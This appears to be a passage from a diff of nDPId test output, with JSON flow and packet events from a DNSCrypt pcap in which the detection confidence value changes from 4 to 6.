01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YZAAH4Rg9UKAAAB1C\/kiJXjAbsCCHuObd4BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":455,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":181,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":38371,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02427{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAXcIEwgAH4RfVAKAAAB1C\/kiIW0AbsGBB6ibd0BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":456,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":182,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":34228,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_packet_id":1,"flow_last_seen":946739380804,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAAIc\/YdAAH4Rg9QKAAAB1C\/kiMtYAbsCCHuObeIBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":457,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380804,"flow_last_seen":946739380804,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380804,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380804} 00421{"packet_event_id":1,"packet_event_name":"packet","packet_id":458,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380804,"pkt":"REREREREZmZmZmZmCABFAABQIEwAuX4RoiMKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00603{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01145{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":554,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":554,"pkt_l4_len":520,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAIc\/YhAAH4Rg9MKAAAB1C\/kiJ9HAbsCCHuObeABAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAHEAAwBwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":459,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":184,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":512,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":512,"flow_avg_l4_payload_len":512,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":40775,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YkgAH4RoBIKAAAB1C\/kiNwPAbsGBMhCbeEBAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA="} -00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00664{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":460,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":185,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":56335,"dst_port":443,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 00225{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","l4_data_len":60,"global_ts_msec":946739380805} 00422{"packet_event_id":1,"packet_event_name":"packet","packet_id":461,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":94,"pkt_l4_len":0,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAABQ\/YkAuX4RxOUKAAAB1C\/kiAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA=="} 00607{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":946739380805,"flow_last_seen":946739380805,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739380805,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":60885,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02428{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":186,"flow_packet_id":1,"flow_last_seen":946739380805,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1514,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1514,"pkt_l4_len":1480,"thread_ts_msec":946739380805,"pkt":"REREREREZmZmZmZmCABFAAXc\/YogAH4RoBEKAAAB1C\/kiO3VAbsGBLZ+bd8BAAABAAAAAAABATINZG5zY3J5cHQtY2VydAJmcghkbnNjcnlwdANvcmcAABAAAQAAAAAAAAAAAAXAAAwFvAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA